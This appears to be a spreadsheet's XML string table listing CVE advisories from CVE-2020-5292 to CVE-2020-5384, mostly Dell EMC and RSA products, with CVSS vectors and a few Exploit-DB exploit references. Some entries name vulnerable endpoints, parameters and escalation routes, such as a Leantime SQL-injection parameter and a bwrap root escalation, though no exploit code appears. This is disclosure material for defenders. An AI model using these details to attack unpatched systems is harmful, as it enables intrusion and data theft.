    <t>Bubblewrap (bwrap) before version 0.4.1, if installed in setuid mode and the kernel supports unprivileged user namespaces, then the `bwrap --userns2` option can be used to make the setuid process keep running as root while being traceable. This can in turn be used to gain root permissions. Note that this only affects the combination of bubblewrap in setuid mode (which is typically used when unprivileged user namespaces are not supported) and the support of unprivileged user namespaces. Known to be affected are: * Debian testing/unstable, if unprivileged user namespaces enabled (not default) * Debian buster-backports, if unprivileged user namespaces enabled (not default) * Arch if using `linux-hardened`, if unprivileged user namespaces enabled (not default) * Centos 7 flatpak COPR, if unprivileged user namespaces enabled (not default) This has been fixed in the 0.4.1 release, and all affected users should update.</t>
  </si>
  <si>
    <t>CVE-2020-5292</t>
  </si>
  <si>
    <t>Leantime before versions 2.0.15 and 2.1-beta3 has a SQL Injection vulnerability. The impact is high. Malicious users/attackers can execute arbitrary SQL queries negatively affecting the confidentiality, integrity, and availability of the site. Attackers can exfiltrate data like the users' and administrators' password hashes, modify data, or drop tables. The unescaped parameter is "searchUsers" when sending a POST request to "/tickets/showKanban" with a valid session. In the code, the parameter is named "users" in class.tickets.php. This issue is fixed in versions 2.0.15 and 2.1.0 beta 3.</t>
  </si>
  <si>
    <t>CVE-2020-5293</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.0.0 and 1.7.6.5, there are improper access controls on product page with combinations, attachments and specific prices. The problem is fixed in 1.7.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5294</t>
  </si>
  <si>
    <t>PrestaShop module ps_facetedsearch versions before 2.1.0 has a reflected XSS with social networks fields The problem is fixed in 2.1.0</t>
  </si>
  <si>
    <t>CVE-2020-5295</t>
  </si>
  <si>
    <t>In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the `cms.manage_assets` permission. Issue has been patched in Build 466 (v1.0.466).</t>
  </si>
  <si>
    <t>exploits/php/webapps/49045.sh</t>
  </si>
  <si>
    <t>October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)</t>
  </si>
  <si>
    <t>CVE-2020-5296</t>
  </si>
  <si>
    <t>In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to delete arbitrary local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the `cms.manage_assets` permission. Issue has been patched in Build 466 (v1.0.466).</t>
  </si>
  <si>
    <t>CVE-2020-5297</t>
  </si>
  <si>
    <t>In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to upload jpg, jpeg, bmp, png, webp, gif, ico, css, js, woff, woff2, svg, ttf, eot, json, md, less, sass, scss, xml files to any directory of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the `cms.manage_assets` permission. Issue has been patched in Build 466 (v1.0.466).</t>
  </si>
  <si>
    <t>CVE-2020-5298</t>
  </si>
  <si>
    <t>In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, a user with the ability to use the import functionality of the `ImportExportController` behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack on the user in question Issue has been patched in Build 466 (v1.0.466).</t>
  </si>
  <si>
    <t>CVE-2020-5299</t>
  </si>
  <si>
    <t>In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, any users with the ability to modify any data that could eventually be exported as a CSV file from the `ImportExportController` could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: 1. Have found a vulnerability in the victims spreadsheet software of choice. 2. Control data that would potentially be exported through the `ImportExportController` by a theoretical victim. 3. Convince the victim to export above data as a CSV and run it in vulnerable spreadsheet software while also bypassing any sanity checks by said software. Issue has been patched in Build 466 (v1.0.466).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-5300</t>
  </si>
  <si>
    <t>In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion `jti`: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness of this `jti` value. Exploiting this vulnerability is somewhat difficult because: - TLS protects against MITM which makes it difficult to intercept valid tokens for replay attacks - The expiry time of the JWT gives only a short window of opportunity where it could be replayed This has been patched in version v1.4.0+oryOS.17</t>
  </si>
  <si>
    <t>CVE-2020-5301</t>
  </si>
  <si>
    <t>SimpleSAMLphp versions before 1.18.6 contain an information disclosure vulnerability. The module controller in `SimpleSAML\Module` that processes requests for pages hosted by modules, has code to identify paths ending with `.php` and process those as PHP code. If no other suitable way of handling the given path exists it presents the file to the browser. The check to identify paths ending with `.php` does not account for uppercase letters. If someone requests a path ending with e.g. `.PHP` and the server is serving the code from a case-insensitive file system, such as on Windows, the processing of the PHP code does not occur, and the source code is instead presented to the browser. An attacker may use this issue to gain access to the source code in third-party modules that is meant to be private, or even sensitive. However, the attack surface is considered small, as the attack will only work when SimpleSAMLphp serves such content from a file system that is not case-sensitive, such as on Windows. This issue is fixed in version 1.18.6.</t>
  </si>
  <si>
    <t>CVE-2020-5302</t>
  </si>
  <si>
    <t>MH-WikiBot (an IRC Bot for interacting with the Miraheze API), had a bug that allowed any unprivileged user to access the steward commands on the IRC interface by impersonating the Nickname used by a privileged user as no check was made to see if they were logged in. The issue has been fixed in commit 23d9d5b0a59667a5d6816fdabb960b537a5f9ed1.</t>
  </si>
  <si>
    <t>CVE-2020-5303</t>
  </si>
  <si>
    <t>Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a peer after it's removed in Mempool reactor. This does not happen all the time. It only happens when a connection fails (for any reason) before the Peer is created and added to all reactors. RemovePeer is therefore called before AddPeer, which leads to always growing memory (activeIDs map). The activeIDs map has a maximum size of 65535 and the node will panic if this map reaches the maximum. An attacker can create a lot of connection attempts (exploiting above denial of service), which ultimately will lead to the node panicking. These issues are patched in Tendermint 0.33.3 and 0.32.10.</t>
  </si>
  <si>
    <t>CVE-2020-5304</t>
  </si>
  <si>
    <t>The dashboard in WhiteSource Application Vulnerability Management (AVM) before version 20.4.1 allows Log Injection via a %0A%0D substring in the idp parameter to the /saml/login URI. This closes the current log and creates a new log with one line of data. The attacker can also insert malicious data and false entries.</t>
  </si>
  <si>
    <t>CVE-2020-5305</t>
  </si>
  <si>
    <t>Codoforum 4.8.3 allows XSS in the admin dashboard via a name field of a new user, i.e., on the Manage Users screen.</t>
  </si>
  <si>
    <t>CVE-2020-5306</t>
  </si>
  <si>
    <t>Codoforum 4.8.3 allows XSS via a post using parameters display name, title name, or content.</t>
  </si>
  <si>
    <t>CVE-2020-5307</t>
  </si>
  <si>
    <t>PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.</t>
  </si>
  <si>
    <t>CVE-2020-5308</t>
  </si>
  <si>
    <t>PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to XSS, as demonstrated by the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName parameter in add-product.php.</t>
  </si>
  <si>
    <t>CVE-2020-5310</t>
  </si>
  <si>
    <t>libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.</t>
  </si>
  <si>
    <t>CVE-2020-5311</t>
  </si>
  <si>
    <t>libImaging/SgiRleDecode.c in Pillow before 6.2.2 has an SGI buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-5312</t>
  </si>
  <si>
    <t>libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX P mode buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-5313</t>
  </si>
  <si>
    <t>libImaging/FliDecode.c in Pillow before 6.2.2 has an FLI buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-5315</t>
  </si>
  <si>
    <t>Dell EMC Repository Manager (DRM) version 3.2 contains a plain-text password storage vulnerability. Proxy server user password is stored in a plain text in a local database. A local authenticated malicious user with access to the local file system may use the exposed password to access the with privileges of the compromised user.</t>
  </si>
  <si>
    <t>CVE-2020-5316</t>
  </si>
  <si>
    <t>Dell SupportAssist for Business PCs versions 2.0, 2.0.1, 2.0.2, 2.1, 2.1.1, 2.1.2, 2.1.3 and Dell SupportAssist for Home PCs version 2.0, 2.0.1, 2.0.2, 2.1, 2.1.1, 2.1.2, 2.1.3, 2.2, 2.2.1, 2.2.2, 2.2.3, 3.0, 3.0.1, 3.0.2, 3.1, 3.2, 3.2.1, 3.2.2, 3.3, 3.3.1, 3.3.2, 3.3.3, 3.4 contain an uncontrolled search path vulnerability. A locally authenticated low privileged user could exploit this vulnerability to cause the loading of arbitrary DLLs by the SupportAssist binaries, resulting in the privileged execution of arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-5317</t>
  </si>
  <si>
    <t>Dell EMC ECS versions prior to 3.4.0.1 contain an XSS vulnerability. A remote authenticated malicious user could exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application.</t>
  </si>
  <si>
    <t>CVE-2020-5318</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions 8.1.2, 8.1.0.4, 8.1.0.3, and 8.0.0.7 contain a vulnerability in some configurations. An attacker may exploit this vulnerability to gain access to restricted files. The non-RAN HTTP and WebDAV file-serving components have a vulnerability wherein when either are enabled, and Basic Authentication is enabled for either or both components, files are accessible without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-5319</t>
  </si>
  <si>
    <t>Dell EMC Unity, Dell EMC Unity XT, and Dell EMC UnityVSA versions prior to 5.0.2.0.5.009 contain a Denial of Service vulnerability on NAS Server SSH implementation that is used to provide SFTP service on a NAS server. A remote unauthenticated attacker may potentially exploit this vulnerability and cause a Denial of Service (Storage Processor Panic) by sending an out of order SSH protocol sequence.</t>
  </si>
  <si>
    <t>CVE-2020-5320</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Enterprise (OME) versions prior to 3.2 and OpenManage Enterprise-Modular (OME-M) versions prior to 1.10.00 contain a SQL injection vulnerability. A remote authenticated malicious user with high privileges could potentially exploit this vulnerability to execute SQL commands to perform unauthorized actions.</t>
  </si>
  <si>
    <t>CVE-2020-5321</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Enterprise (OME) versions prior to 3.2 and OpenManage Enterprise-Modular (OME-M) versions prior to 1.10.00 contain an improper input validation vulnerability. A remote authenticated malicious user with high privileges could potentially exploit this vulnerability to spawn tasks with elevated privileges.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5322</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Enterprise-Modular (OME-M) versions prior to 1.10.00 contain a command injection vulnerability. A remote authenticated malicious user with high privileges could potentially exploit the vulnerability to execute arbitrary shell commands on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-5323</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Enterprise (OME) versions prior to 3.2 and OpenManage Enterprise-Modular (OME-M) versions prior to 1.10.00 contain an injection vulnerability. A remote authenticated malicious user with low privileges could potentially exploit this vulnerability to gain access to sensitive information or cause denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-5324</t>
  </si>
  <si>
    <t>Dell Client Consumer and Commercial Platforms contain an Arbitrary File Overwrite Vulnerability. The vulnerability is limited to the Dell Firmware Update Utility during the time window while being executed by an administrator. During this time window, a locally authenticated low-privileged malicious user could exploit this vulnerability by tricking an administrator into overwriting arbitrary files via a symlink attack. The vulnerability does not affect the actual binary payload that the update utility delivers.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5326</t>
  </si>
  <si>
    <t>Affected Dell Client platforms contain a BIOS Setup configuration authentication bypass vulnerability in the pre-boot Intel Rapid Storage Response Technology (iRST) Manager menu. An attacker with physical access to the system could perform unauthorized changes to the BIOS Setup configuration settings without requiring the BIOS Admin password by selecting the Optimized Defaults option in the pre-boot iRST Manager.</t>
  </si>
  <si>
    <t>CVE-2020-5327</t>
  </si>
  <si>
    <t>Dell Security Management Server versions prior to 10.2.10 contain a Java RMI Deserialization of Untrusted Data vulnerability. When the server is exposed to the internet and Windows Firewall is disabled, a remote unauthenticated attacker may exploit this vulnerability by sending a crafted RMI request to execute arbitrary code on the target host.</t>
  </si>
  <si>
    <t>CVE-2020-5328</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions prior to 8.2.0 contain an unauthorized access vulnerability due to a lack of thorough authorization checks when SyncIQ is licensed, but encrypted syncs are not marked as required. When this happens, loss of control of the cluster can occur.</t>
  </si>
  <si>
    <t>CVE-2020-5329</t>
  </si>
  <si>
    <t>Dell EMC Avamar Server contains an open redirect vulnerability. A remote unauthenticated attacker may exploit this vulnerability to redirect application users to arbitrary web URLs by tricking the victim users to click on maliciously crafted links.</t>
  </si>
  <si>
    <t>CVE-2020-5330</t>
  </si>
  <si>
    <t>Dell EMC Networking X-Series firmware versions 3.0.1.2 and older, Dell EMC Networking PC5500 firmware versions 4.1.0.22 and older and Dell EMC PowerEdge VRTX Switch Modules firmware versions 2.0.0.77 and older contain an information disclosure vulnerability. A remote unauthenticated attacker could exploit this vulnerability to retrieve sensitive data by sending a specially crafted request to the affected endpoints.</t>
  </si>
  <si>
    <t>CVE-2020-5331</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P3 (6.7.0.3), contain an information exposure vulnerability. Users’ session information could potentially be stored in cache or log files. An authenticated malicious local user with access to the log files may obtain the exposed information to use it in further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-5332</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P3 (6.7.0.3), contain a command injection vulnerability. AN authenticated malicious user with administrator privileges could potentially exploit this vulnerability to execute arbitrary commands on the system where the vulnerable application is deployed.</t>
  </si>
  <si>
    <t>CVE-2020-5333</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P3 (6.7.0.3), contain an authorization bypass vulnerability in the REST API. A remote authenticated malicious Archer user could potentially exploit this vulnerability to view unauthorized information.</t>
  </si>
  <si>
    <t>CVE-2020-5334</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P2 (6.7.0.2), contains a Document Object Model (DOM) based cross-site scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to supply malicious HTML or JavaScript code to DOM environment in the browser. The malicious code is then executed by the web browser in the context of the vulnerable web application.</t>
  </si>
  <si>
    <t>CVE-2020-5335</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P2 (6.7.0.2), contain a cross-site request forgery vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to send arbitrary requests to the vulnerable application to perform server operations with the privileges of the authenticated victim user.</t>
  </si>
  <si>
    <t>CVE-2020-5336</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P1 (6.7.0.1), contain a URL injection vulnerability. An unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to execute malicious JavaScript code on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-5337</t>
  </si>
  <si>
    <t>RSA Archer, versions prior to 6.7 P1 (6.7.0.1), contain a URL redirection vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to redirect application users to arbitrary web URLs by tricking the victim users to click on maliciously crafted links. The vulnerability could be used to conduct phishing attacks that cause users to unknowingly visit malicious sites.</t>
  </si>
  <si>
    <t>CVE-2020-5339</t>
  </si>
  <si>
    <t>RSA Authentication Manager versions prior to 8.4 P10 contain a stored cross-site scripting vulnerability in the Security Console. A malicious RSA Authentication Manager Security Console administrator with advanced privileges could exploit this vulnerability to store arbitrary HTML or JavaScript code through the Security Console web interface. When other Security Console administrators open the affected report page, the injected scripts could potentially be executed in their browser.</t>
  </si>
  <si>
    <t>CVE-2020-5340</t>
  </si>
  <si>
    <t>RSA Authentication Manager versions prior to 8.4 P10 contain a stored cross-site scripting vulnerability in the Security Console. A malicious RSA Authentication Manager Security Console administrator with advanced privileges could exploit this vulnerability to store arbitrary HTML or JavaScript code through the Security Console web interface. When other Security Console administrators attempt to change the default security domain mapping, the injected scripts could potentially be executed in their browser.</t>
  </si>
  <si>
    <t>CVE-2020-5341</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data Vulnerability Dell EMC Avamar Server versions 7.4.1, 7.5.0, 7.5.1, 18.2, 19.1 and 19.2 and Dell EMC Integrated Data Protection Appliance versions 2.0, 2.1, 2.2, 2.3, 2.4 and 2.4.1 contain a Deserialization of Untrusted Data Vulnerability. A remote unauthenticated attacker could exploit this vulnerability to send a serialized payload that would execute code on the system.</t>
  </si>
  <si>
    <t>CVE-2020-5342</t>
  </si>
  <si>
    <t>Dell Digital Delivery versions prior to 3.5.2015 contain an incorrect default permissions vulnerability. A locally authenticated low-privileged malicious user could exploit this vulnerability to run an arbitrary executable with administrative privileges on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-5343</t>
  </si>
  <si>
    <t>Dell Client platforms restored using a Dell OS recovery image downloaded before December 20, 2019, may contain an insecure inherited permissions vulnerability. A local authenticated malicious user with low privileges could exploit this vulnerability to gain unauthorized access on the root folder.</t>
  </si>
  <si>
    <t>CVE-2020-5344</t>
  </si>
  <si>
    <t>Dell EMC iDRAC7, iDRAC8 and iDRAC9 versions prior to 2.65.65.65, 2.70.70.70, 4.00.00.00 contain a stack-based buffer overflow vulnerability. An unauthenticated remote attacker may exploit this vulnerability to crash the affected process or execute arbitrary code on the system by sending specially crafted input data.</t>
  </si>
  <si>
    <t>CVE-2020-5345</t>
  </si>
  <si>
    <t>Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17, Dell EMC Unisphere for PowerMax Virtual Appliance versions prior to 9.1.0.17, and PowerMax OS Release 5978 contain an authorization bypass vulnerability. An authenticated malicious user may potentially execute commands to alter or stop database statistics.</t>
  </si>
  <si>
    <t>CVE-2020-5346</t>
  </si>
  <si>
    <t>RSA Authentication Manager versions prior to 8.4 P11 contain a stored cross-site scripting vulnerability in the Security Console. A malicious RSA Authentication Manager Security Console administrator with advanced privileges could exploit this vulnerability to store arbitrary HTML or JavaScript code through the Security Console web interface. When other Security Console administrators open the affected page, the injected scripts could potentially be executed in their browser.</t>
  </si>
  <si>
    <t>CVE-2020-5347</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions 8.2.2 and earlier contain a denial of service vulnerability. SmartConnect had an error condition that may be triggered to loop, using CPU and potentially preventing other SmartConnect DNS responses.</t>
  </si>
  <si>
    <t>CVE-2020-5348</t>
  </si>
  <si>
    <t>Dell Latitude 7202 Rugged Tablet BIOS versions prior to A28 contain a UAF vulnerability in EFI_BOOT_SERVICES in system management mode. A local unauthenticated attacker may exploit this vulnerability by overwriting the EFI_BOOT_SERVICES structure to execute arbitrary code in system management mode.</t>
  </si>
  <si>
    <t>CVE-2020-5349</t>
  </si>
  <si>
    <t>Dell EMC Networking S4100 and S5200 Series Switches manufactured prior to February 2020 contain a hardcoded credential vulnerability. A remote unauthenticated malicious user could exploit this vulnerability and gain administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5350</t>
  </si>
  <si>
    <t>Dell EMC Integrated Data Protection Appliance versions 2.0, 2.1, 2.2, 2.3, 2.4 contain a command injection vulnerability in the ACM component. A remote authenticated malicious user with root privileges could inject parameters in the ACM component APIs that could lead to manipulation of passwords and execution of malicious commands on ACM component.</t>
  </si>
  <si>
    <t>CVE-2020-5351</t>
  </si>
  <si>
    <t>Dell EMC Data Protection Advisor versions 6.4, 6.5 and 18.1 contain an undocumented account with limited privileges that is protected with a hard-coded password. A remote unauthenticated malicious user with the knowledge of the hard-coded password may login to the system and gain read-only privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5352</t>
  </si>
  <si>
    <t>Dell EMC Data Protection Advisor 6.4, 6.5 and 18.1 contain an OS command injection vulnerability. A remote authenticated malicious user may exploit this vulnerability to execute arbitrary commands on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-5353</t>
  </si>
  <si>
    <t>The Dell Isilon OneFS versions 8.2.2 and earlier and Dell EMC PowerScale OneFS version 9.0.0 default configuration for Network File System (NFS) allows access to an 'admin' home directory. An attacker may leverage a spoofed Unique Identifier (UID) over NFS to rewrite sensitive files to gain administrative access to the system.</t>
  </si>
  <si>
    <t>CVE-2020-5355</t>
  </si>
  <si>
    <t>The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.</t>
  </si>
  <si>
    <t>CVE-2020-5356</t>
  </si>
  <si>
    <t>Dell PowerProtect Data Manager (PPDM) versions prior to 19.4 and Dell PowerProtect X400 versions prior to 3.2 contain an improper authorization vulnerability. A remote authenticated malicious user may download any file from the affected PowerProtect virtual machines.</t>
  </si>
  <si>
    <t>CVE-2020-5357</t>
  </si>
  <si>
    <t>Dell Dock Firmware Update Utilities for Dell Client Consumer and Commercial docking stations contain an Arbitrary File Overwrite vulnerability. The vulnerability is limited to the Dell Dock Firmware Update Utilities during the time window while being executed by an administrator. During this time window, a locally authenticated low-privileged malicious user could exploit this vulnerability by tricking an administrator into overwriting arbitrary files via a symlink attack. The vulnerability does not affect the actual binary payload that the update utility delivers.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-5358</t>
  </si>
  <si>
    <t>Dell Encryption versions prior to 10.7 and Dell Endpoint Security Suite versions prior to 2.7 contain a privilege escalation vulnerability due to incorrect permissions. A local malicious user with low privileges could potentially exploit this vulnerability to gain elevated privilege on the affected system with the help of a symbolic link.</t>
  </si>
  <si>
    <t>CVE-2020-5359</t>
  </si>
  <si>
    <t>Dell BSAFE Micro Edition Suite, versions prior to 4.5, are vulnerable to an Unchecked Return Value Vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability to modify and corrupt the encrypted data.</t>
  </si>
  <si>
    <t>CVE-2020-5360</t>
  </si>
  <si>
    <t>Dell BSAFE Micro Edition Suite, versions prior to 4.5, are vulnerable to a Buffer Under-Read Vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability resulting in undefined behaviour, or a crash of the affected systems.</t>
  </si>
  <si>
    <t>CVE-2020-5361</t>
  </si>
  <si>
    <t>Select Dell Client Commercial and Consumer platforms support a BIOS password reset capability that is designed to assist authorized customers who forget their passwords. Dell is aware of unauthorized password generation tools that can generate BIOS recovery passwords. The tools, which are not authorized by Dell, can be used by a physically present attacker to reset BIOS passwords and BIOS-managed Hard Disk Drive (HDD) passwords. An unauthenticated attacker with physical access to the system could potentially exploit this vulnerability to bypass security restrictions for BIOS Setup configuration, HDD access and BIOS pre-boot authentication.</t>
  </si>
  <si>
    <t>CVE-2020-5362</t>
  </si>
  <si>
    <t>Dell Client Consumer and Commercial platforms include an improper authorization vulnerability in the Dell Manageability interface for which an unauthorized actor, with local system access with OS administrator privileges, could bypass the BIOS Administrator authentication to restore BIOS Setup configuration to default values.</t>
  </si>
  <si>
    <t>CVE-2020-5363</t>
  </si>
  <si>
    <t>Select Dell Client Consumer and Commercial platforms include an issue that allows the BIOS Admin password to be changed through Dell's manageability interface without knowledge of the current BIOS Admin password. This could potentially allow an unauthorized actor, with physical access and/or OS administrator privileges to the device, to gain privileged access to the platform and the hard drive.</t>
  </si>
  <si>
    <t>CVE-2020-5364</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions 8.2.2 and earlier contain an SNMPv2 vulnerability. The SNMPv2 services is enabled, by default, with a pre-configured community string. This community string allows read-only access to many aspects of the Isilon cluster, some of which are considered sensitive and can foster additional access.</t>
  </si>
  <si>
    <t>CVE-2020-5365</t>
  </si>
  <si>
    <t>Dell EMC Isilon versions 8.2.2 and earlier contain a remotesupport vulnerability. The pre-configured support account, remotesupport, is bundled in the Dell EMC Isilon OneFS installation. This account is used for diagnostics and other support functions. Although the default password is different for every cluster, it is predictable.</t>
  </si>
  <si>
    <t>CVE-2020-5366</t>
  </si>
  <si>
    <t>Dell EMC iDRAC9 versions prior to 4.20.20.20 contain a Path Traversal Vulnerability. A remote authenticated malicious user with low privileges could potentially exploit this vulnerability by manipulating input parameters to gain unauthorized read access to the arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-5367</t>
  </si>
  <si>
    <t>Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17, Dell EMC Unisphere for PowerMax Virtual Appliance versions prior to 9.1.0.17, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.</t>
  </si>
  <si>
    <t>CVE-2020-5368</t>
  </si>
  <si>
    <t>Dell EMC VxRail versions 4.7.410 and 4.7.411 contain an improper authentication vulnerability. A remote unauthenticated attacker may exploit this vulnerability to obtain sensitive information in an encrypted form.</t>
  </si>
  <si>
    <t>CVE-2020-5369</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions 8.2.2 and earlier and Dell EMC PowerScale OneFS version 9.0.0 contain a privilege escalation vulnerability. An authenticated malicious user may exploit this vulnerability by using SyncIQ to gain unauthorized access to system management files.</t>
  </si>
  <si>
    <t>CVE-2020-5370</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Enterprise (OME) versions prior to 3.4 contain an arbitrary file overwrite vulnerability. A remote authenticated malicious user with high privileges could potentially exploit this vulnerability to overwrite arbitrary files via directory traversal sequences using a crafted tar file to inject malicious RPMs which may cause a denial of service or perform unauthorized actions.</t>
  </si>
  <si>
    <t>CVE-2020-5371</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS versions 8.2.2 and earlier and Dell EMC PowerScale version 9.0.0 contain a file permissions vulnerability. An attacker, with network or local file access, could take advantage of insufficiently applied file permissions or gain unauthorized access to files.</t>
  </si>
  <si>
    <t>CVE-2020-5372</t>
  </si>
  <si>
    <t>Dell EMC PowerStore versions prior to 1.0.1.0.5.002 contain a vulnerability that exposes test interface ports to external network. A remote unauthenticated attacker could potentially cause Denial of Service via test interface ports which are not used during run time environment.</t>
  </si>
  <si>
    <t>CVE-2020-5373</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Integration for Microsoft System Center (OMIMSSC) for SCCM and SCVMM versions prior to 7.2.1 contain an improper authentication vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to retrieve the system inventory data of the managed device.</t>
  </si>
  <si>
    <t>CVE-2020-5374</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Integration for Microsoft System Center (OMIMSSC) for SCCM and SCVMM versions prior to 7.2.1 contain a hard-coded cryptographic key vulnerability. A remote unauthenticated attacker may exploit this vulnerability to gain access to the appliance data for remotely managed devices.</t>
  </si>
  <si>
    <t>CVE-2020-5376</t>
  </si>
  <si>
    <t>Dell Inspiron 7347 BIOS versions prior to A13 contain a UEFI BIOS Boot Services overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the EFI_BOOT_SERVICES structure to execute arbitrary code in System Management Mode (SMM).</t>
  </si>
  <si>
    <t>CVE-2020-5377</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.</t>
  </si>
  <si>
    <t>exploits/windows/webapps/49750.py</t>
  </si>
  <si>
    <t>Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read</t>
  </si>
  <si>
    <t>2021-04-07</t>
  </si>
  <si>
    <t>CVE-2020-5378</t>
  </si>
  <si>
    <t>Dell G7 17 7790 BIOS versions prior to 1.13.2 contain a UEFI BIOS Boot Services overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the EFI_BOOT_SERVICES structure to execute arbitrary code in System Management Mode (SMM).</t>
  </si>
  <si>
    <t>CVE-2020-5379</t>
  </si>
  <si>
    <t>Dell Inspiron 7352 BIOS versions prior to A12 contain a UEFI BIOS Boot Services overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the EFI_BOOT_SERVICES structure to execute arbitrary code in System Management Mode (SMM).</t>
  </si>
  <si>
    <t>CVE-2020-5383</t>
  </si>
  <si>
    <t>Dell EMC Isilon OneFS version 8.2.2 and Dell EMC PowerScale OneFS version 9.0.0 contains a buffer overflow vulnerability in the Likewise component. A remote unauthenticated malicious attacker may potentially exploit this vulnerability to cause a process restart.</t>
  </si>
  <si>
    <t>CVE-2020-5384</t>
  </si>
  <si>
    <t>Authentication Bypass Vulnerability RSA MFA Agent 2.0 for Microsoft Windows contains an Authentication Bypass vulnerability. A local unauthenticated attacker could potentially exploit this vulnerability by using an alternate path to bypass authentication in order to gain full access to the system.</t>
